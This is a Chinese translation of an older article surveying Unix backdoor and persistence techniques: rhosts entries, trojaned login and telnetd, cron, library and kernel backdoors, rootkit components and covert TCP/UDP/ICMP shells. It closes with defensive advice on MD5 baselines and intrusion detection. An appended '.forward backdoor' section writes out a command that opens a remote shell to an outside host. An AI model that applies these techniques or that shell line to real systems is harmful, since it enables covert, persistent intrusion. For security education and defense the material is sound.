在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管
理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.

校验和及时间戳后门

早期,许多入侵者用自己的trojan程序替代二进制文件. 系统管理员便依*时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序. 入侵者又发展了使trojan文件和原文件时间戳同步的新技术. 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间. 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间. sum程序是基于CRC校验, 很容易
骗过.入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序. MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过.

Login后门

在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便
用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露.入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的.

Telnetd后门

当用户telnet到系统, 监听端口的inetd服务接受连接随后递给in.telnetd,由它运行login.一些入侵者知道管理员会检查login是否被修改, 就着手修改in.telnetd.在in.telnetd内部有一些对用户信息的检验, 比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门, 当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门, 对来自特定源端口的连接产
生一个shell .

服务后门

几乎所有网络服务曾被入侵者作过后门. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本随处多是. 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问.这些程序有时用刺娲□？ucp这样不用的服务,或者被加入inetd.conf作为一个新的服务.管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验.

Cronjob后门

Unix上的Cronjob可以按时间表调度特定程序的运行. 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问. 也可以查看cronjob中经常运行的合法程序,同时置入后门.

库后门

几乎所有的UNIX系统使用共享库. 共享库用于相同函数的重用而减少代码长度. 一些入侵者在象crypt.c和_crypt.c这些函数里作了后门. 象login.c这样的程序调用了crypt(),当使用后门口令时产生一个shell. 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数.而且许多管理员并不会检查库是否被做了后门.对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验. 有一种办法是入侵者对open()和文件访问函数做后门. 后门函数读原文件但执行trojan后门程序. 所以 当MD5读这些文件时,校验和一切正常. 但当系统运行时将执行trojan版本的. 即使trojan库本身也可躲过MD5校验. 对于管理员来说有一种方法可以找到后门, 就是静态编连MD5校验程序然后运行.静态连接程序不会使用trojan共享库.

内核后门

内核是Unix工作的核心. 用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广.

文件系统后门

入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现. 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等. 有时为了防止管理员发现这么大的文件, 入侵者需要修补"ls","","fsck"以隐匿特定的目录和文件.在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区. 因此入侵者只能用特别的工具访问这些隐藏的文件. 对于普通的
管理员来说, 很难发现这些"坏扇区"里的文件系统, 而它又确实存在.

Boot块后门

在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变. Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区.

隐匿进程后门

入侵者通常想隐匿他们运行的程序. 这样的程序一般是口令破解程序和监听程序 (sniffer).有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名. 可以将sniffer程序改名类似in.syslog再执行. 因此当管理员用"ps"检查运行进程时, 出现 的是标准服务名. 可以修改库函数致使
"ps"不能显示所有进程. 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现. 使用这个技术的一个后门例子是amod.tar.gz :

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

也可以修改内核隐匿进程.

Rootkit

最流行的后门安装包之一是rootkit. 它很容易用web搜索器找到.从Rootkit的README里,可以找到一些典型的文件:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.

网络通行后门

入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行. 这些网络通行后门有时允许入侵者通过防火墙进行访问. 有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行, 管理员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文.

TCP Shell 后门

入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉. 通常这些后门可以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口, 许多防火墙允许e-mail通行的.

UDP Shell 后门

管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以netstat不能显示入侵者的访问痕迹. 许多防火墙设置成允许类似DNS的UDP报文的通行. 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙.

ICMP Shell 后门

Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.

加密连接

管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了.

Windows NT

由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序. 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Network Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此处该如何翻译? :(

解决

当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀.

评估

首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之.许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性.

MD5基准线

一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前由干净系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.

入侵检测

随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.

从CD-ROM启动

一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.

警告

由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句该如何翻译? :( )
-------------------------------------------------------------------------
you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"

permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
&nbs>

the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).

你也许要增加:

.forward后门

Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户'username'的.forward可能设置如下:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).>利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail>类程序, 很有可能还有问题 ......)
参考资料：..com